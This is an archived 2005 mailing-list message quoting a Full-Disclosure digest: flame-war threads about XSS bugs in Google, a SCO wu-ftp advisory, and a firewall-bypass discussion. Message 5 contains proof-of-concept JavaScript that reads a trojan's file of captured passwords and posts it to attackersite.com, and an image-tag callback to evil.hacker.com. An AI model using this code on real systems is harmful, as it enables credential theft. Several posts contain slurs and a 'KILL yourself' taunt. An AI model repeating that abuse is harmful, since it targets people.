Open Source and information security mailing list archives
 
Message-ID: <BAY22-F146FEF776BF79AB2FC4DD8EF310@phx.gbl>
Date: Wed Dec 21 18:31:04 2005
From: jmcboy981 at hotmail.com (Ahmed Aydogan)
Subject: RE:DON'T SEND ME AGAIN PLS

DON'T SEND ME AGAIN PLS


>From: full-disclosure-request@...ts.grok.org.uk
>Reply-To: full-disclosure@...ts.grok.org.uk
>To: full-disclosure@...ts.grok.org.uk
>Subject: Full-Disclosure Digest, Vol 10, Issue 70
>Date: Wed, 21 Dec 2005 18:25:14 +0000 (GMT)
>
>Send Full-Disclosure mailing list submissions to
>	full-disclosure@...ts.grok.org.uk
>
>To subscribe or unsubscribe via the World Wide Web, visit
>	https://lists.grok.org.uk/mailman/listinfo/full-disclosure
>or, via email, send a message with subject or body 'help' to
>	full-disclosure-request@...ts.grok.org.uk
>
>You can reach the person managing the list at
>	full-disclosure-owner@...ts.grok.org.uk
>
>When replying, please edit your Subject line so it is more specific
>than "Re: Contents of Full-Disclosure digest..."
>
>
>Note to digest recipients - when replying to digest posts, please trim your 
>post appropriately. Thank you.
>
>
>Today's Topics:
>
>    1. Re: XSS vulnerabilities in Google.com (Mohit Muthanna)
>    2. Alternate take on list trolls (womber)
>    3. Re: XSS vulnerabilities in Google.com (fok yo)
>    4. Re: XSS vulnerabilities in Google.com (n3td3v)
>    5. Re: new attack technique? using JavaScript+XML+OWS	Post Data
>       (Joachim Schipper)
>    6. SCOSA-2005.63 OpenServer 5.0.6 OpenServer 5.0.7 OpenServer
>       6.0.0 : wu-ftp Denial of Service Vulnerability (security@....com)
>    7. Re: XSS vulnerabilities in Google.com (GroundZero Security)
>    8. Re: XSS vulnerabilities in Google.com (n3td3v)
>    9. RE: XSS vulnerabilities in Google.com (Edward Pearson)
>   10. Re: XSS vulnerabilities in Google.com (GroundZero Security)
>   11. Character vulnerabilities (Peer Janssen)
>   12. Re: XSS vulnerabilities in Google.com (fok yo)
>   13. [EMED-L] Patriot Act and HIPPA (fwd) (J.A. Terranson)
>   14. Re: Firewall (The Movie) -
>       http://firewallmovie.warnerbros.com/cmp/trailer.html?id=trailer
>       (Slythers Bro)
>   15. Re: XSS vulnerabilities in Google.com (n3td3v)
>   16. Re: SCOSA-2005.63 OpenServer 5.0.6 OpenServer 5.0.7
>       OpenServer 6.0.0 : wu-ftp Denial of Service Vulnerability (KF 
>(lists))
>   17. RE: Character vulnerabilities (wilder_jeff Wilder)
>   18. Re: XSS vulnerabilities in Google.com (GroundZero Security)
>   19. Re: XSS vulnerabilities in Google.com (n3td3v)
>
>
>----------------------------------------------------------------------
>
>Message: 1
>Date: Wed, 21 Dec 2005 11:00:11 -0500
>From: Mohit Muthanna <mohit.muthanna@...il.com>
>Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
>To: GroundZero Security <fd@....org>
>Cc: full-disclosure@...ts.grok.org.uk
>Message-ID:
>	<fdb3980a0512210800h13a10f20h83cab9d43942a59c@...l.gmail.com>
>Content-Type: text/plain; charset=ISO-8859-1
>
>I thought I qualified my response well enough to prevent any
>ambiguities, but I guess I have to try again.
>
> > > Sure, but "google != howardsblog.com". A large part of the population
> > > (including myself) relies on Google's various services for day-to-day
> > > use. I sure as hell would not feel comfortable knowing that I'm using
> > > a service that can potentially leak my information.
> >
 > > i'm not talking about some shitty site that no one knows, but a lot of big websites have
 > > such vulnerabilities.
>
>And they should be disclosed. Plain and simple.
>
> > > That's quite a blanket statement to make. I'm sure a few people in the
> > > "security community" would like to know that there exists a
> > > vulnerability in a Google service.
> >
 > > yeah maybe but if we end up posting about every site that offers services to users
 > > and has xss issues then this list would be receiving a flood of mails :P
>
>That's called full-disclosure. It's the point of this list. It keeps
>(or attempts to keep) service providers, software companies, and the
>"security community" on their toes.
>
 > > its not hard to test for xss, so if you are really so afraid of it go test it yourself and
 > > notify the website owner.
>
>I don't have the time for it, nor do I care for it. I rely on this and
>other lists to keep me informed.
>
> > > No. But a site need not be audited to discover a bug.
> >
> > ah ok so you think illegal activity is the way to go ?
>
>Where did you get that impression? Let me rephrase for clarity:
>
>No it is not legal. But a bug can be discovered by other means than
>auditing. Like say, by simply using the service.
>
> > > XSS can do a lot of harm. A compromised administrator account is
> > > generally a compromised server. There are some good XSS resources on
> > > the web you can read up on.
> >
 > > no as they dont rely on /etc/passwd users but have their own database usually
 > > via mysql or so and a compromised admin user on some webinterface isnt always
 > > going to end up in compromise of the whole server unless the admin is stupid
 > > enough to use the same passwords for root and the webbased software.
>
>That isn't outside the realm of possibility.
>
>Again, you missed my qualifier: "generally".
>
>It is quite likely that once a determined hacker has admin privileges
>on "some webinterface", he will eventually find a way to own the box.
>Not "always" but "quite likely".
>
>FYI, /etc/passwd is not the only way one can gain root. Larger
>services don't even use /etc/passwd.
>
>There's more than one way to skin a cat.
>
 > > in most cases this will only end up in control of the web parts i.e. some forum.
 > > i agree that this is a problem, but its still not resulting in root access on the shell.
>
>How do you know? Have you worked with every single web application
>that exists in the universe?
>
>In any case, even if it doesn't result in gaining root, don't you
>think that it is serious? If an XSS vulnerability was found in Flickr,
>or del.icio.us, or basecamp, or any other online service, and it led
>to "control of the web parts", would you be comfortable using their
>services?
>
>What if they were paid services? Then does it qualify for full-disclosure?
>
> > oh and i dont have to read about it so keep your sarcasm to yourself.
>
>So then you agree that an XSS vulnerability is serious, and should be
>disclosed.
>
> > > Then, my friend, you have discovered a bug.
> >
 > > mhm sure, imagine you find a DoS in your precious google, then you would take them
 > > down and you really believe they would thank you for that ?
 > >  you would be raided in no time.
 > > you think they would believe you that you did it only for a good cause ? yeah right...
>
>If I found it during the course of my using the service, sure. Why not?
>
>I've developed online services before, and I've had bugs reported.
>Contrary to what you may think, instead of "calling the feds", I try
>to fix the problem as soon as I can. I'm also glad it was reported by
>a user, as opposed to being exploited by a hacker.
>
> > > "There are 10 types of people. Those who understand binary, and those
> > > who don't."
> >
> > you dont...
>
>Very classy.
>
>--
>Mohit Muthanna [mohit (at) muthanna (uhuh) com]
>"There are 10 types of people. Those who understand binary, and those
>who don't."
>
>
>------------------------------
>
>Message: 2
>Date: Wed, 21 Dec 2005 10:13:54 -0600
>From: womber <womber@...il.com>
>Subject: [Full-disclosure] Alternate take on list trolls
>To: full-disclosure@...ts.grok.org.uk
>Message-ID:
>	<5aad114b0512210813q44a28d0m236471a6251b0652@...l.gmail.com>
>Content-Type: text/plain; charset=ISO-8859-1
>
>I know some people have stated they thought a certain list member (to
>remain nameless) is really someone doing social engineering.
>Given the type of replies recently it is starting to look to me as
>this could be possible.
>The statement "where are your yahoo or google exploits?" which keeps
>coming up makes me feel like yahoo is too cheap to check their code
>themselves or pay a firm to check, that they try to stir up security
>people to check it thoroughly because they can shove it back in a
>certain member's face.
>It could also be a severe lack of social skills on that person's part.
>Just thought I would throw that out there, because it would not be
>unlike a company to avoid paying money if they do not have to.
>
>
>------------------------------
>
>Message: 3
>Date: Wed, 21 Dec 2005 17:15:10 +0100
>From: fok yo <yoo.fok@...il.com>
>Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
>To: GroundZero Security <fd@....org>
>Cc: full-disclosure@...ts.grok.org.uk
>Message-ID: <cd8f1f1e0512210815h145c0796v@...l.gmail.com>
>Content-Type: text/plain; charset="iso-8859-1"
>
>exactly.
>n3td3v's nothing but a pose, she's trying to be a respected security
>researcher, but she hides behind an anonymous nick. What groundbreaking
>research did n3tf4rt conduct? Nothing, still google has 68K+ hits for
>n3td3v, waste of bandwidth, storage, time.
>This is an ongoing pollution which should come to an end. Please nd, KILL
>yourself, don't even post your suicide note to fd (although that would be
>the post of the year).
>I hope google or yahoo sue n3td0rk for reverse engineering their web apps.
>Jealousy is something for 14yo girls, bitch.
>
>2005/12/21, GroundZero Security <fd@....org>:
> >
 > > google or yahoo, google or yahoo ..blah go find some real bugs no one is
 > > jealous of you, we just think
 > > its ridiculous how you try to show off with your non existing skills and
 > > reputation. you are the greatest lamer
 > > i've seen on this list so far. so instead of bragging about how great you
 > > are, you should actually try and learn about
> > security then soon you will realize that your xss shit is just pathetic
> > and nothing to be proud of.
> > you think finding some simple xss in a website such as yahoo or google
> > makes you superior to everyone else here ?
> > 99% of the people on this list are more skilled than you, thats fact! so
> > stop trying to show off it wont work.
> > code a double free() remote exploit, then i would agree that you have
> > skill. until you do that shut the fuck up kiddie.
> > when i started over 11 years ago, you couldnt even spell the word
> > computer. so please you should finally realize
 > > that you are at the wrong place. i mean look around how many people
 > > complain about you being annoying.
> > oh and if you couldnt figure it out by now, groundzero is my company you
> > little moron.
> > -sk
> > ----- Original Message -----
> > From: "n3td3v" <xploitable@...il.com>
 > > To: "GroundZero Security" <fd@....org>; <full-disclosure@...ts.grok.org.uk>
> > Sent: Wednesday, December 21, 2005 4:26 PM
> > Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
> >
> >
> > > Your argument for having Google and Yahoo vulnerabilities (especially
> > > XSS) banned from FD is very poor. GroundZero or whoever you may be.
> > > Please get off the list and stop disrespecting others who do disclose
> > > vulnerabilities in Google And Yahoo
> > >
> > > On 12/21/05, GroundZero Security <fd@....org> wrote:
> > > >
 > > > > > Sure, but "google != howardsblog.com". A large part of the population
 > > > > > (including myself) relies on Google's various services for day-to-day
 > > > > > use. I sure as hell would not feel comfortable knowing that I'm using
 > > > > > a service that can potentially leak my information.
 > > > >
 > > > > i'm not talking about some shitty site that no one knows, but a lot of big websites have
 > > > > such vulnerabilities.
 > > > >
 > > > > > That's quite a blanket statement to make. I'm sure a few people in the
 > > > > > "security community" would like to know that there exists a
 > > > > > vulnerability in a Google service.
 > > > >
 > > > > yeah maybe but if we end up posting about every site that offers services to users
 > > > > and has xss issues then this list would be receiving a flood of mails :P
 > > > > its not hard to test for xss, so if you are really so afraid of it go test it yourself and
 > > > > notify the website owner.
 > > > >
 > > > > > No. But a site need not be audited to discover a bug.
 > > > >
 > > > > ah ok so you think illegal activity is the way to go ?
 > > > > you cant just audit any site you want you know, but hey
 > > > > if you want to get a visit from the feds why dont you audit some gov/mil i'm sure
 > > > > there are lots of xss to discover :P
 > > > >
 > > > > > XSS can do a lot of harm. A compromised administrator account is
 > > > > > generally a compromised server. There are some good XSS resources on
 > > > > > the web you can read up on.
 > > > >
 > > > > no as they dont rely on /etc/passwd users but have their own database usually
 > > > > via mysql or so and a compromised admin user on some webinterface isnt always
 > > > > going to end up in compromise of the whole server unless the admin is stupid
 > > > > enough to use the same passwords for root and the webbased software.
 > > > > in most cases this will only end up in control of the web parts i.e. some forum.
 > > > > i agree that this is a problem, but its still not resulting in root access on the shell.
 > > > > oh and i dont have to read about it so keep your sarcasm to yourself.
 > > > >
 > > > > > Then, my friend, you have discovered a bug.
 > > > >
 > > > > mhm sure, imagine you find a DoS in your precious google, then you would take them
 > > > > down and you really believe they would thank you for that ? you would be raided in no time.
 > > > > you think they would believe you that you did it only for a good cause ? yeah right...
 > > > >
 > > > >
 > > > > > "There are 10 types of people. Those who understand binary, and those
 > > > > > who don't."
> > > >
> > > > you dont...
> > > >
> > > >
> > > > _______________________________________________
> > > > Full-Disclosure - We believe in it.
> > > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > > > Hosted and sponsored by Secunia - http://secunia.com/
> > > >
> > >
> >
>
>------------------------------
>
>Message: 4
>Date: Wed, 21 Dec 2005 16:21:01 +0000
>From: n3td3v <xploitable@...il.com>
>Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
>To: GroundZero Security <fd@....org>,
>	full-disclosure@...ts.grok.org.uk
>Message-ID:
>	<4b6ee9310512210821j7a5e8484l7253cf5de1a159fe@...l.gmail.com>
>Content-Type: text/plain; charset=ISO-8859-1
>
>On 12/21/05, GroundZero Security <fd@....org> wrote:
> > google or yahoo, google or yahoo
>
>Google and Yahoo is my specialized subject as is corporate security as
>a whole, don't be surprised if Google and Yahoo come up, they're the
>biggest of the biggest out there on the landscape.
>
 > its ridiculous how you try to show off with your non existing skills and reputation. you are the greatest lamer
>
>You're very sure I don't have any skills?
>
 > you think finding some simple xss in a website such as yahoo or google makes you superior to everyone else here ?
>
>You must be thinking thats all I find ;-)
>
 > 99% of the people on this list are more skilled than you, thats fact! so stop trying to show off it wont work.
>
>You're not one of them, be off with you
>
 > code a double free() remote exploit, then i would agree that you have skill. until you do that shut the fuck up kiddie.
>
>Using profanity against those with more Google and Yahoo
>vulnerabilities than you won't help you become better
>
 > when i started over 11 years ago, you couldnt even spell the word computer. so please you should finally realize
 > that you are at the wrong place. i mean look around how many people complain about you being annoying.
 > oh and if you couldnt figure it out by now, groundzero is my company you little moron.
>
>11 years, and hijacking legitimate disclosures like this one? You've
>learned a lot. God forbid you, if you really do own a security company.
>
>
>------------------------------
>
>Message: 5
>Date: Wed, 21 Dec 2005 17:36:04 +0100
>From: Joachim Schipper <j.schipper@...h.uu.nl>
>Subject: Re: [Full-disclosure] new attack technique? using
>	JavaScript+XML+OWS	Post Data
>To: full-disclosure@...ts.grok.org.uk
>Message-ID: <20051221163604.GC23202@...pomene.jschipper.dynalias.net>
>Content-Type: text/plain; charset=us-ascii
>
>On Wed, Dec 21, 2005 at 08:58:30PM +0530, Gaurav Kumar wrote:
> > While researching COM related security vulnerabilities I thought of
> > this possible attack technique, not sure if it has been discussed
> > before.
> >
> >
> > Problem/challenge statement:
> >
> > A Trojan has been to be placed in a system running an application
> > firewall like Zone Alarm Pro etc. The Trojan is not allowed to make
> > any outbound connections. The challenge is to send data (key logged
> > passwords etc) back to the attacker.
>
> > Solution
> >
> > The Trojan can be designed to generate an xml file which will contain
> > the data to be sent out. The attacker will lure the user to visit a
> > website hosted by him. The site can have following HTML code-
> >
> > <html>
> > <body>
> > The author is not responsible for any misuse, this PoC is for
> > educational purpose only.
> > <object classid="clsid:{BDEADE98-C265-11D0-BCED-00A0C90AB50F}"
> > id="exp">
> > </object>
> > <script LANGUAGE=javascript>
> > var xmlDoc
> > xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
> > xmlDoc.async=false;
> > xmlDoc.load("c:\\note.xml");
> > xmlObj=xmlDoc.documentElement;
> > var a= xmlObj.firstChild.text;
> > exp.Post(0,"http://www.attackersite.com/input.asp",a);
> > </script>
> > </body>
> > </html>
> >
> > Content of note.xml could be ?
> >
> > <password>secret</password>
> >
> >
 > > The above code (works well on windows XP SP2) essentially calls "OWS
> > Post Data" COM control to post the contents of note.xml (generated by
> > trojan) to attackersite.com
> >
> > Essentially, the technique is breaking the basic functionality of
> > application firewalls by using OWS Post Data as bridge for sending out
> > the data using Javascript and XML.
>
> > flames/spam/abuse etc can be sent to spam@...urebox.org
> > comments can be sent to gaurav@...urebox.org
>
>I'll just assume you read the list.
>
>I'm not an expert, but I don't recall ever seeing this particular
>implementation. Then again, there are easier ways to go about this - for
>instance, how about embedding a <img
>src="http://evil.hacker.com/callback/ThisIsMyVerySecretPassWord" width=1
>height=1> tag into an arbitrary HTML file? It works on any graphical
>browser without special protection.
>
>Search the archives for some more neat tricks - calling the proper APIs,
>IE can be used to send out pretty much arbitrary data. [1]
>
>If you're willing to attack ZA specifically (instead of a generic
>application/-based firewall, of which there are many) just use the
>Windows API to generate the proper mouse clicks/keypresses.
>
>		Joachim
>
>[1] Some would say that, calling the 'proper' APIs, IE can be used to
>send *in* pretty much arbitrary data too. I'd be inclined to agree.
>
>
>------------------------------
>
>Message: 6
>Date: Wed, 21 Dec 2005 11:34:42 -0500 (EST)
>From: security@....com
>Subject: [Full-disclosure] SCOSA-2005.63 OpenServer 5.0.6 OpenServer
>	5.0.7 OpenServer 6.0.0 : wu-ftp Denial of Service Vulnerability
>To: security-announce@...t.sco.com
>Message-ID: <Pine.UW2.4.63.0512211134040.11687@...d.nj.sco.com>
>Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>______________________________________________________________________________
>
>  			SCO Security Advisory
>
>Subject:		OpenServer 5.0.6 OpenServer 5.0.7 OpenServer 6.0.0 : wu-ftp 
>Denial of Service Vulnerability
>Advisory number:	SCOSA-2005.63
>Issue date:		2005 December 21
>Cross reference:	sr893936 fz532335 erg712856
>  			sr895049 fz533027 erg712952
>  			CVE-2005-0256
>______________________________________________________________________________
>
>
>1. Problem Description
>
>  	The wu_fnmatch function in wu_fnmatch.c allows remote attackers
>  	to cause a denial of service (CPU exhaustion by recursion) via a
>  	glob pattern with a large number of * (wildcard) characters, as
>  	demonstrated using the dir command.
>
>  	The Common Vulnerabilities and Exposures project (cve.mitre.org)
>  	has assigned the following name CVE-2005-0256 to this issue.
>
>
>2. Vulnerable Supported Versions
>
>  	System				Binaries
>  	----------------------------------------------------------------------
>  	OpenServer 5.0.6 		/etc/ftpd
>  	OpenServer 5.0.7 		/etc/ftpd
>  	OpenServer 6.0.0 		/etc/ftpd
>
>
>3. Solution
>
>  	The proper solution is to install the latest packages.
>
>
>4. OpenServer 5.0.6
>
>  	4.1 Location of Fixed Binaries
>
>  	ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.63
>
>
>  	4.2 Verification
>
>  	MD5 (p532335.506_vol.tar) = 89ea2ed1f88da6721bd73c3889f9ac0c
>
>  	md5 is available for download from
>  		ftp://ftp.sco.com/pub/security/tools
>
>
>  	4.3 Installing Fixed Binaries
>
>  	The following package should be installed on your system before you
>  	install this fix:
>
>  		OSS646C
>
>  	Upgrade the affected binaries with the following sequence:
>
>  	1) Download p532335.506_vol.tar to a directory.
>
>  	2) Extract VOL* files.
>
>  	   # tar xvf p532335.506_vol.tar
>
>  	3) Run the custom command, specify an install
>  	   from media images, and specify the directory as
>  	   the location of the images.
>
>
>5. OpenServer 5.0.7
>
>  	5.1 Location of Fixed Binaries
>
>  	The fixes are only available in SCO OpenServer Release 5.0.7
>  	Maintenance Pack 4 or later.
>
>  	ftp://ftp.sco.com/pub/openserver5/507/mp/osr507mp4/osr507mp4_vol.tar
>
>
>  	5.2 Verification
>
>  	MD5 (osr507mp4_vol.tar) = 4c87d840ff5b43221258547d19030228
>
>  	md5 is available for download from
>  		ftp://ftp.sco.com/pub/security/tools
>
>
>  	5.3 Installing Fixed Binaries
>
>  	See the SCO OpenServer Release 5.0.7 Maintenance Pack 4 Release
>  	and Installation Notes:
>
>  	ftp://ftp.sco.com/pub/openserver5/507/mp/osr507mp4/osr507mp4.htm
>
>
>6. OpenServer 6.0.0
>
>  	6.1 Location of Fixed Binaries
>
>  	ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.63
>
>
>  	6.2 Verification
>
>  	MD5 (p533027.600_vol.tar) = d939cb729d115c9bef2d2032903f2125
>
>  	md5 is available for download from
>  		ftp://ftp.sco.com/pub/security/tools
>
>
>  	6.3 Installing Fixed Binaries
>
>  	Upgrade the affected binaries with the following sequence:
>
>  	1) Download p533027.600_vol.tar to a directory.
>
>  	2) Extract VOL* files.
>
>  	   # tar xvf p533027.600_vol.tar
>
>  	3) Run the custom command, specify an install
>  	   from media images, and specify the directory as
>  	   the location of the images.
>
>
>7. References
>
>  	Specific references for this advisory:
>  		http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0256
>  
>		http://www.idefense.com/application/poi/display?id=207&type=vulnerabilities
>
>  	SCO security resources:
>  		http://www.sco.com/support/security/index.html
>
>  	SCO security advisories via email
>  		http://www.sco.com/support/forums/security.html
>
>  	This security fix closes SCO incidents sr893936 fz532335
>  	erg712856 sr895049 fz533027 erg712952.
>
>
>8. Disclaimer
>
>  	SCO is not responsible for the misuse of any of the information
>  	we provide on this website and/or through our security
>  	advisories. Our advisories are a service to our customers
>  	intended to promote secure installation and use of SCO
>  	products.
>
>
>9. Acknowledgments
>
>  	SCO would like to thank Adam Zabrocki.
>
>______________________________________________________________________________
>-----BEGIN PGP SIGNATURE-----
>Version: GnuPG v1.4.2 (UnixWare)
>
>iD8DBQFDqYDTaqoBO7ipriERAtzOAJ0ctD8xRYQrLkkgyHsMqCvfQdPBFQCeIgx7
>xqqmzQCNiw6t+WtSL5rqo4E=
>=ha4X
>-----END PGP SIGNATURE-----
>
>
>------------------------------
>
>Message: 7
>Date: Wed, 21 Dec 2005 17:57:31 +0100
>From: "GroundZero Security" <fd@....org>
>Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
>To: "php0t" <php0t@...ro.hu>
>Cc: full-disclosure@...ts.grok.org.uk
>Message-ID: <017001c6064f$a4617030$0100a8c0@...learwinter>
>Content-Type: text/plain;	charset="iso-8859-1"
>
>yes you are right, but its like if noone tells him what a stupid fag he is,
>he will keep posting and posting his irrelevant crap and just ignore the 
>tons of private
>mail he receives. i'm sorry for adding to the noise, but its just too 
>tempting.
>i try to ignore it. but i cant promise i will, the last mail he sent just 
>asks for a reply :P
>but ok...must...resist.....
>btw my name is not groundzero, thats my company :)
>
>greetz
>-sk
>Http://www.groundzero-security.com
>
>----- Original Message -----
>From: "php0t" <php0t@...ro.hu>
>To: "'GroundZero Security'" <fd@....org>
>Sent: Wednesday, December 21, 2005 5:06 PM
>Subject: RE: [Full-disclosure] XSS vulnerabilities in Google.com
>
>
> >
> >   hi, groundzero.
> >
> > I agree whole heartedly and the dood pisses me off too, just like
> > everybody else.
> >
> >   On the other hand, seeing him repeat google/yahoo again and again all
> > the time and seeing the obvious-to-come replies makes my email alert
> > fuck the mp3's up I'm listening to too often.
> >
> >   My idea is this: how'bout each time the guy posts something
> > ridiculous, all of us who are grasping our heads tearing our last pieces
 > > of hair out thinking to ourselves 'omfgwtfd00d' just write him a private
> > email containing talk-to-the-hand or something? This would achieve two
> > things: 1) less noise on the list 2) instead of being able to reply
> > endlessly with bullcrap to the thread, he would just have to deal with
> > nobody giving a fuck about him in public, still 10 emails saying 'I
> > don't care' whenever he makes a post.
> >
> >   Tell me if you think this sucks, it's just an idea.
> >
> > Php0t
> >
> >
> >
> >
> > -----Original Message-----
> > From: full-disclosure-bounces@...ts.grok.org.uk
> > [mailto:full-disclosure-bounces@...ts.grok.org.uk] On Behalf Of
> > GroundZero Security
> > Sent: Wednesday, December 21, 2005 4:54 PM
> > To: n3td3v
> > Cc: full-disclosure@...ts.grok.org.uk
> > Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
> >
> >
 > > google or yahoo, google or yahoo ..blah go find some real bugs no one is
 > > jealous of you, we just think
 > > its ridiculous how you try to show off with your non existing skills and
 > > reputation. you are the greatest lamer i've seen on this list so far. so
 > > instead of bragging about how great you are, you should actually try and
> > learn about security then soon you will realize that your xss shit is
> > just pathetic and nothing to be proud of. you think finding some simple
> > xss in a website such as yahoo or google makes you superior to everyone
> > else here ? 99% of the people on this list are more skilled than you,
> > thats fact! so stop trying to show off it wont work. code a double
> > free() remote exploit, then i would agree that you have skill. until you
> > do that shut the fuck up kiddie. when i started over 11 years ago, you
> > couldnt even spell the word computer. so please you should finally
> > realize that you are at the wrong place. i mean look around how many
 > > people complain about you being annoying. oh and if you couldnt figure
> > it out by now, groundzero is my company you little moron. -sk
> > ----- Original Message -----
> > From: "n3td3v" <xploitable@...il.com>
> > To: "GroundZero Security" <fd@....org>;
> > <full-disclosure@...ts.grok.org.uk>
> > Sent: Wednesday, December 21, 2005 4:26 PM
> > Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
> >
> >
> > > Your argument for having Google and Yahoo vulnerabilities (especially
> > > XSS) banned from FD is very poor. GroundZero or whoever you may be.
> > > Please get off the list and stop disrespecting others who do disclose
> > > vulnerabilities in Google And Yahoo
> > >
> > > On 12/21/05, GroundZero Security <fd@....org> wrote:
> > > >
> > > > > Sure, but "google != howardsblog.com". A large part of the
> > > > > population (including myself) relies on Google's various services
> > > > > for day-to-day use. I sure as hell would not feel comfortable
> > > > > knowing that I'm using a service that can potentially leak my
> > > > > information.
> > > >
 > > > > i'm not talking about some shitty site that no one knows, but a lot
 > > > > of big websites have such vulnerabilities.
> > > >
> > > > > That's quite a blanket statement to make. I'm sure a few people in
> >
> > > > > the "security community" would like to know that there exists a
> > > > > vulnerability in a Google service.
> > > >
> > > > yeah maybe but if we end up posting about every site that offers
> > > > services to users and has xss issues then this list would be
 > > > > receiving a flood of mails :P its not hard to test for xss, so if you
> >
> > > > are really so afraid of it go test it yourself and notify the
> > > > website owner.
> > > >
> > > > > No. But a site need not be audited to discover a bug.
> > > >
> > > > ah ok so you think illegal activity is the way to go ?
> > > > you cant just audit any site you want you know, but hey
> > > > if you want to get a visit from the feds why dont you audit some
> > > > gov/mil i'm sure there are lots of xss to discover :P
> > > >
> > > > > XSS can do a lot of harm. A compromised administrator account is
> > > > > generally a compromised server. There are some good XSS resources
> > > > > on the web you can read up on.
> > > >
> > > > no as they dont rely on /etc/passwd users but have their own
> > > > database usually via mysql or so and a compromised admin user on
> > > > some webinterface isnt always going to end up in compromise of the
> > > > whole server unless the admin is stupid enough to use the same
> > > > passwords for root and the webbased software. in most cases this
> > > > will only end up in control of the web parts i.e. some forum. i
> > > > agree that this is a problem, but its still not resulting in root
> > > > access on the shell. oh and i dont have to read about it so keep
> > > > your sarcasm to yourself.
> > > >
> > > > > Then, my friend, you have discovered a bug.
> > > >
> > > > mhm sure, imagine you find a DoS in your precious google, then you
 > > > > would take them down and you really believe they would thank you for
 > > > > that ? you would be raided in no time. you think they would believe
> > > > you that you did it only for a good cause ? yeah right...
> > > >
> > > >
> > > > > "There are 10 types of people. Those who understand binary, and
> > > > > those who don't."
> > > >
> > > > you dont...
> > > >
> > > >
> > > >
> > >
> >
>
>
>------------------------------
>
>Message: 8
>Date: Wed, 21 Dec 2005 17:16:54 +0000
>From: n3td3v <xploitable@...il.com>
>Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
>To: GroundZero Security <fd@....org>,
>	full-disclosure@...ts.grok.org.uk
>Message-ID:
>	<4b6ee9310512210916h66104d21n484173a514c0d57e@...l.gmail.com>
>Content-Type: text/plain; charset=ISO-8859-1
>
>You trolled this thread by saying Watchfire should stop disclosing
>vulnerabilities for Yahoo and Google. You get the response you
>deserved to get. Now you're running off the thread now with your tail
>between your legs, because everyone has told you that Google and Yahoo
>vulnerabilities (especially XSS) will never be banned from FD.
>
>
>On 12/21/05, GroundZero Security <fd@....org> wrote:
> > yes you are right, but its like if noone tells him what a stupid fag he is,
> > he will keep posting and posting his irrelevant crap and just ignore the tons of private
> > mail he receives. i'm sorry for adding to the noise, but its just too tempting.
> > i try to ignore it. but i cant promise i will, the last mail he sent just asks for a reply :P
> > but ok...must...resist.....
> > btw my name is not groundzero, thats my company :)
> >
> > greetz
> > -sk
>
>
>------------------------------
>
>Message: 9
>Date: Wed, 21 Dec 2005 17:41:14 -0000
>From: "Edward Pearson" <Ed@...tymail.co.uk>
>Subject: RE: [Full-disclosure] XSS vulnerabilities in Google.com
>To: <full-disclosure@...ts.grok.org.uk>
>Message-ID:
>	<4DB4124FD67F9745B9E09DADDC297467724292@...tydc.unity1.local>
>Content-Type: text/plain;	charset="us-ascii"
>
>Why has this become a trolling?
>"if noone tell him what a stupid fag he is"
>Are we back at fucking middle school? Have we descended to the level of
>10 year olds??
>
>Ground Zero, I've seen your company website(s) and your products. All I
>say is I think you have several very good reasons to pay FUCKING close
>attention to what is said on this list. Work it out.
>
>The only people who seem hell bent on ruining this list for everyone
>are:
>InfoSecBOFH
>n3td3v
>Ground Zero Security
>
>None of these people have anything to bring to the table.
>Let's see at least one real vuln report/exploit from one of you, and then
>the other two have to concentrate on growing up enough to not troll it
>or make stupid pre-school comments.
>
>Come on guys!!! I'm beginning to think that actually you're not bigger
>than this...
>
>Ultimately, if you've got problems with each other, do it on MSN, AIM,
>IRC, USENET whatever, just not my inbox.
>
>Have a fucking excellent day.
>
>- Ed (BTW, Ground Zero's has my alias since 1995, now I see that this
>chump is going round putting a black mark by it)
>
>-----Original Message-----
>From: full-disclosure-bounces@...ts.grok.org.uk
>[mailto:full-disclosure-bounces@...ts.grok.org.uk] On Behalf Of n3td3v
>Sent: 21 December 2005 17:17
>To: GroundZero Security; full-disclosure@...ts.grok.org.uk
>Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
>
>You trolled this thread by saying Watchfire should stop disclosing
>vulnerabilities for Yahoo and Google. You get the response you deserved
>to get. Now you're running off the thread now with your tail between
>your legs, because everyone has told you that Google and Yahoo
>vulnerabilities (especially XSS) will never be banned from FD.
>
>
>On 12/21/05, GroundZero Security <fd@....org> wrote:
> > yes you are right, but its like if noone tells him what a stupid fag
> > he is, he will keep posting and posting his irrelevant crap and just
> > ignore the tons of private mail he receives. i'm sorry for adding to
> > the noise, but its just too tempting.
> > i try to ignore it. but i cant promise i will, the last mail he sent
> > just asks for a reply :P but ok...must...resist.....
> > btw my name is not groundzero, thats my company :)
> >
> > greetz
> > -sk
>
>
>
>
>------------------------------
>
>Message: 10
>Date: Wed, 21 Dec 2005 18:39:31 +0100
>From: "GroundZero Security" <fd@....org>
>Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
>To: "n3td3v" <xploitable@...il.com>
>Cc: full-disclosure@...ts.grok.org.uk
>Message-ID: <017701c60655$8263e750$0100a8c0@...learwinter>
>Content-Type: text/plain;	charset="iso-8859-1"
>
>lol you wont ever give up kiddie dont you ?
>i do not care about google and yahoo vulnerabilities.
>i agree to leave you alone, but you ask for it again and again so be it.
>1 person said its ok for the xss vuln. you cant even count or did you see any
>other mails ? how about the tons of people that constantly tell you to shut the fuck up
>since we are all tired of you. you say the same shit over and over again.
>if someone tells you facts then you ignore it, because you have no other arguments as that
>someone else wouldnt have found lame xss bugs in google or yahoo and therefore they shouldnt
>be allowed on this list. you are the last person to even dare to say something like this.
>you have nothing else to say than that people would be jealous of you or how precious
>your lame xss bugs are. noone cares about your shitty vulnerabilities you found as it doesnt
